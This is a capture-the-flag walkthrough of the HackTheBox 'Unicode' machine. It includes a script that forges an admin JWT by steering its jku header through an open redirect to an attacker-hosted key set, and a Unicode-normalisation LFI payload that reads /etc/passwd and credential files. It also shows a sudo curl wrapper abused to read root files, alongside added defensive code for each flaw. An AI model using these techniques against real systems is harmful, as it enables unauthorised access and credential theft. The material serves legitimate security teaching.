Unicode — HackTheBox Machine WriteUp
This post is a walkthrough of Unicode, a Medium-level machine on HackTheBox.
Enumeration
Starting out with the initial nmap scan:
nmap -A -vv 10.10.11.126
We have ports 22 and 80 open. So let’s enumerate port 80 now.
We have a webpage named Hackmedia.
Enumerating further we have a login page.
I tried SQL injection but it didn’t work, so I registered an account and logged in with it to test the functionality.
We have a user dashboard. Next we can check the upload file functionality.
After testing this feature I couldn’t bypass it so I moved on to test some other things.
Gaining Access
Looking at the cookie, we have a JWT token.
Looking at the decoded token, there are a few things we can tweak to log in as admin and escalate further.
I’ll be adding hackmedia.htb to the /etc/hosts file:
echo "10.10.11.126 hackmedia.htb" | sudo tee -a /etc/hosts
Visiting the link above, we get the following page.
Now here’s what we’ll be doing. First we’ll generate a new RSA key pair and replace the values in the jwks.json file above with the public parameters of our key. Then we’ll point the token’s jku header at our own tweaked jwks.json instead of the original one.
The following command will generate an RSA key pair:
openssl genrsa -out key.pem 2048
The following Python script will load our key pair file and print out the values we need to change in the jwks.json file:
from jwcrypto import jwk

with open('key.pem', 'rb') as pem:
    key = jwk.JWK.from_pem(pem.read())

# The public parameters of the key include the kid and the modulus n we need for jwks.json
pub = key.export_public(as_dict=True)
print(pub)
print(f"n: {pub['n']}")
We’ll replace the 'n' and 'kid' values in the jwks.json file.
Now our jwks.json file is as follows:
We’ll start a Python HTTP server so the target can fetch our tweaked jwks.json file:
python3 -m http.server 80
The following script signs a new JWT with our key, sets the jku header to our jwks.json (reached through the site’s /redirect/ endpoint), and changes the value of the user claim to admin:
from jwcrypto import jwk, jwt

with open('key.pem', 'rb') as pem:
    key = jwk.JWK.from_pem(pem.read())

# jku points at our hosted jwks.json via the /redirect/ endpoint; the user claim becomes admin
my_token = jwt.JWT(
    header={'alg': 'RS256',
            'jku': 'http://hackmedia.htb/static/../redirect/?url=10.10.14.160/jwks.json'},
    claims={'user': 'admin'},
)
my_token.make_signed_token(key)
print(my_token.serialize())
Now, looking at our token, we have:
Now we’ll replace our original token with the token above.
Boom! We are logged in to the admin dashboard.
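The forged token above is accepted because the server trusts whatever jku the client supplies, and a jku that starts with the expected /static/ directory still reaches the open redirect once the ../ is resolved. The following is an added example (not code from the write-up or from the Hackmedia application) showing how a verifier should treat the jku header: the naive prefix check lets the forged URL through, while the strict check accepts only the exact pinned JWKS URL after path normalisation. The trusted URL, the example token and the dummy signature are constructed for the demo; the signature itself is not verified here, only the decision about where keys may be fetched from.

```python
import base64
import json
import posixpath
from typing import Callable, Optional
from urllib.parse import urlsplit

# Assumption: the application's own key set lives at exactly this URL.
TRUSTED_JWKS_URL = "http://hackmedia.htb/static/jwks.json"

# Constructed headers: the forged one mirrors the jku used in the write-up,
# the legitimate one points at the application's real key set.
FORGED_HEADER = {
    "alg": "RS256",
    "jku": "http://hackmedia.htb/static/../redirect/?url=10.10.14.160/jwks.json",
}
LEGIT_HEADER = {"alg": "RS256", "jku": TRUSTED_JWKS_URL}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def make_demo_token(header: dict, claims: dict) -> str:
    """Build header.payload.signature with a constructed (not real) signature."""
    return ".".join([
        b64url(json.dumps(header).encode()),
        b64url(json.dumps(claims).encode()),
        b64url(b"constructed-signature"),
    ])


def parse_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def naive_jku_ok(jku: str) -> bool:
    """Prefix check only: the forged jku passes because it begins with /static/."""
    return jku.startswith("http://hackmedia.htb/static/")


def strict_jku_ok(jku: str) -> bool:
    """Accept only the exact pinned JWKS URL.

    Scheme and host must match, no query string or fragment is allowed, and the
    path must already be in normal form (no '.', '..' or '//' segments), so the
    key URL cannot be steered through a redirect or another directory.
    """
    trusted = urlsplit(TRUSTED_JWKS_URL)
    got = urlsplit(jku)
    if got.scheme != trusted.scheme or got.netloc != trusted.netloc:
        return False
    if got.query or got.fragment:
        return False
    if posixpath.normpath(got.path) != got.path:
        return False
    return got.path == trusted.path


def key_source_for(token: str, check: Callable[[str], bool]) -> Optional[str]:
    """Return the URL a verifier may fetch keys from, or None to reject the token."""
    hdr = parse_header(token)
    if hdr.get("alg") != "RS256":
        return None
    jku = hdr.get("jku")
    if not isinstance(jku, str) or not check(jku):
        return None
    return jku


if __name__ == "__main__":
    forged = make_demo_token(FORGED_HEADER, {"user": "admin"})
    print("naive :", key_source_for(forged, naive_jku_ok))
    print("strict:", key_source_for(forged, strict_jku_ok))
```

The safest design ignores jku entirely and loads the key set from configuration; where jku must be honoured, the exact-match check above is the minimum, and an open redirect under the trusted host defeats anything weaker.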
After testing for a while, I found that the Current Month page could be vulnerable to LFI.
Accessing the following URL we get:
hackmedia.htb/display/?page=../../etc/passwd
Looking at the error message, we can assume there is some sort of filtering. After looking around and some trial and error, I bypassed the filter and read the /etc/passwd file:
http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd
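The bypass works because %EF%B8%B0 is the UTF-8 encoding of U+FE30 (a presentation-form two-dot leader), which Unicode compatibility normalisation (NFKC) turns into the two ASCII dots "..". A filter that looks for ".." in the raw parameter and only afterwards normalises the string never sees the traversal. The following is an added example, not the application's code: the naive resolver reproduces that ordering bug, and the hardened one normalises first and then checks that the resolved path is still inside the template directory. The base directory is a constructed value.

```python
import posixpath
import unicodedata
from typing import Optional
from urllib.parse import unquote

# Assumption (constructed): the directory the page= parameter is resolved against.
BASE_DIR = "/var/www/hackmedia/templates"

# The percent-encoded segment from the bypass URL: UTF-8 for U+FE30.
ENCODED_SEGMENT = "%EF%B8%B0"


def decode_and_normalise(page: str) -> str:
    """URL-decode, then apply NFKC as the application is presumed to do."""
    return unicodedata.normalize("NFKC", unquote(page))


def naive_resolve(page: str) -> Optional[str]:
    """Check for '..' on the raw input, then normalise and build the path.

    The check runs before NFKC, so U+FE30 passes it and only becomes '..'
    once the path is built.
    """
    raw = unquote(page)
    if ".." in raw:
        return None
    normalised = unicodedata.normalize("NFKC", raw)
    return posixpath.normpath(posixpath.join(BASE_DIR, normalised))


def hardened_resolve(page: str) -> Optional[str]:
    """Normalise first, then refuse anything that resolves outside BASE_DIR.

    Containment is decided on the resolved path rather than on the input
    string, so no encoding of the dots can change the outcome.
    """
    normalised = decode_and_normalise(page)
    if "\x00" in normalised or posixpath.isabs(normalised):
        return None
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, normalised))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    bypass = "/".join([ENCODED_SEGMENT] * 5) + "/etc/passwd"
    print("naive    :", naive_resolve(bypass))
    print("hardened :", hardened_resolve(bypass))
```

The same ordering rule applies to any canonicalisation step (percent-decoding, case folding, Unicode normalisation): validate the form the application actually uses, never the form the client sent.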
We can see that we have a user named code.
From the initial nmap scan we know that the server is running nginx, so we can try to read the default nginx config file.
We can see that there is a db.yaml file, which could contain valid credentials. Looking around for that file, I found it in the following path.
Boom! We have some creds. Let’s try these out over SSH:
ssh code@hackmedia.htb
And we’re in.
user.txt
Reading the user.txt file:
Privilege Escalation
sudo -l
Running the above command, we can see that our user can run the /usr/bin/treport binary as root.
Let’s run this binary first to test the functionality.
Testing the functionality, I noticed that the binary has four options. The most important ones are 2 and 3: with option 3 we can download a file by IP or file name, and with option 2 we can read that file. Also, the binary uses the curl command to fetch the files.
root.txt
Since we can download the file through an IP or a file name, I downloaded the root.txt file and read it.
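The escalation works because a root-run curl will happily fetch whatever source it is handed, including a local file name. The following is an added example, not treport's code, of the input validation such a wrapper needs: only http and https URLs with a host are passed to curl, a bare IPv4 address is turned into an http URL (an assumption about how the "IP" option is meant to be used), and anything else, including a local path or a file:// URL, is refused before curl is ever invoked. The download destination and sample inputs are constructed.

```python
import ipaddress
from typing import List, Optional
from urllib.parse import urlsplit


def validate_fetch_target(target: str) -> Optional[str]:
    """Return a URL curl may be given, or None if the input must be refused.

    A bare IPv4/IPv6 address becomes http://<ip>/ (assumed intent of the IP
    option). Everything else must already be an http(s) URL with a hostname,
    so a local file name or a file:// URL never reaches a root-run curl.
    """
    if not target:
        return None
    parts = urlsplit(target)
    if parts.scheme == "":
        try:
            ip = ipaddress.ip_address(target)
        except ValueError:
            return None
        host = f"[{ip}]" if ip.version == 6 else str(ip)
        return f"http://{host}/"
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return target


def build_curl_argv(target: str, dest: str) -> List[str]:
    """Build the argv for curl with the protocol set pinned and options closed off."""
    url = validate_fetch_target(target)
    if url is None:
        raise ValueError("refusing to fetch: not an http(s) URL or IP address")
    # --proto restricts curl to http/https regardless of what the URL says;
    # "--" ends option parsing so the URL is never read as a flag.
    return ["curl", "--proto", "=http,https", "--output", dest, "--", url]


if __name__ == "__main__":
    for sample in ("10.10.14.160", "http://10.10.14.160/report.txt",
                   "/root/root.txt", "file:///root/root.txt", "root.txt"):
        print(f"{sample!r:32} -> {validate_fetch_target(sample)!r}")
```

Validation of this kind belongs in the privileged program itself; a sudoers entry cannot constrain what the program later does with its own arguments.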
Thanks for reading!